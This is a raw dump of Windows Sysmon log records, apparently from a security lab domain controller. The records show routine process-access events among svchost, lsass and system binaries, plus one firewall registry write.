13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.992{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-2|C=S-1-15-3-3|C=S-1-15-3-4|C=S-1-15-3-6|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-3215430884-1339816292-89257616-1145831019|C=S-1-15-3-3071617654-1314403908-1117750160-3581451107|C=S-1-15-3-593192589-1214558892-284007604-3553228420|C=S-1-15-3-3870101518-1154309966-1696731070-4111764952|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-2345035983-1170044712-735049875-2883010875|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-256
9730672-1095266119-53537203-1209375796|C=S-1-15-3-2452736844-1257488215-2818397580-3305426111|C=S-1-15-3-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|M=microsoft.windows.cortana_cw5n1h2txyewy|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\|PFN=Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy| 10341000x800000000000000010712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.992{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.789{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.789{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.680{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.680{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
